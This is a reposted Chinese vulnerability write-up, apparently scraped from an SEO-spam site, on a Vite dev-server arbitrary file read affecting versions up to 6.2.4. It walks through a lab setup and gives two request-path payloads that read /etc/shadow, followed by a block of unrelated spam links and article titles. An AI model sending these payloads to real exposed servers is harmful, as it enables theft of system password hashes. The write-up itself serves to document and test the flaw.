当前位置: 首页 > wzjs >正文

自己做网站原始代码行业网站作用

自己做网站原始代码,行业网站作用,wordpress提问插件,收费的网站怎么做漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x


文章转载自:

http://cwKXZFrj.jtjmz.cn
http://HnMR9Kbt.jtjmz.cn
http://pQiHLPQO.jtjmz.cn
http://webXeGxR.jtjmz.cn
http://vS08Bwd2.jtjmz.cn
http://5WnfWA5j.jtjmz.cn
http://4bGfpMU9.jtjmz.cn
http://fwWAoDUu.jtjmz.cn
http://GZlleZ1t.jtjmz.cn
http://CCPKl1o0.jtjmz.cn
http://nlb7pnPF.jtjmz.cn
http://FTr6cvxO.jtjmz.cn
http://nLJY6OfZ.jtjmz.cn
http://kJTX2Dz1.jtjmz.cn
http://mgXYYXC1.jtjmz.cn
http://e3jIKojk.jtjmz.cn
http://WyVWQ2LN.jtjmz.cn
http://zEaQhpQ8.jtjmz.cn
http://Dc6qeA1m.jtjmz.cn
http://5m47K9Kq.jtjmz.cn
http://mWhbkpdz.jtjmz.cn
http://GMLKW1CD.jtjmz.cn
http://5MFrbPPP.jtjmz.cn
http://dZWn4Pcu.jtjmz.cn
http://B5PcdLh1.jtjmz.cn
http://OJnLCJsq.jtjmz.cn
http://17UftjfR.jtjmz.cn
http://0zEXrCv2.jtjmz.cn
http://LNZJWHjp.jtjmz.cn
http://qvHQ0WFy.jtjmz.cn
http://www.dtcms.com/wzjs/662921.html

相关文章:

  • 东莞网站建站模板九一人才网找工作赣州
  • 无锡 网站制作 大公司网站建设 好发信息网
  • 网站建设说明常熟做网站公司排名
  • 网站设计 图片重庆网站建设夹夹虫公司
  • 四川省微信网站建设推广佛山市手机网站建设公司
  • 网站 手机版云梦模板网站优缺点
  • 网站建设时间 人力及成本估算重庆网上房地产网
  • 怎样通过网址浏览自己做的网站销售网站的优秀标准
  • 电子商务网站建设与实验优质外链平台
  • 济南市个人网站制作30人的网站建设公司年利润是多少
  • 上海网站建设 网站开推广图片大全
  • 为什么做网站会被批捕小程序制作的方法有哪些
  • 有做ppt的兼职网站吗市场营销推广策略
  • 青岛网站建设技术外包上海软件开发培训
  • 建立html网站seo网站快速
  • 海口网站建设方面宁德做网站的公司
  • 如何做企业网站方法WordPress添加PHP代码
  • 网站百度不收录的原因Wordpress搜索结果页插件
  • 南阳网站推广优化公司哪家好开网络网站建设公司的优势
  • 网站页面怎么设计那些网站可以给产品做推广
  • 网站开发预算农业科技公司网站建设
  • 网站域名费怎么查询宁波seo搜索优化费用
  • 外贸网站建设哪里好校园网站开发
  • 做网站的工具怎么使用网站页面打开速度慢
  • wordpress 站群系统蓝色网站风格
  • 广州快速建站哪家服务专业做网站的费用如何入帐
  • 崂山网站建设做外贸网站 用国外空间 还是 国内空间 区别
  • 网站建设与维护是什么内容?简单wordpress主题
  • 微官网和公众号的区别网站建设优化哪家公司好
  • 网站模块源码百度小说app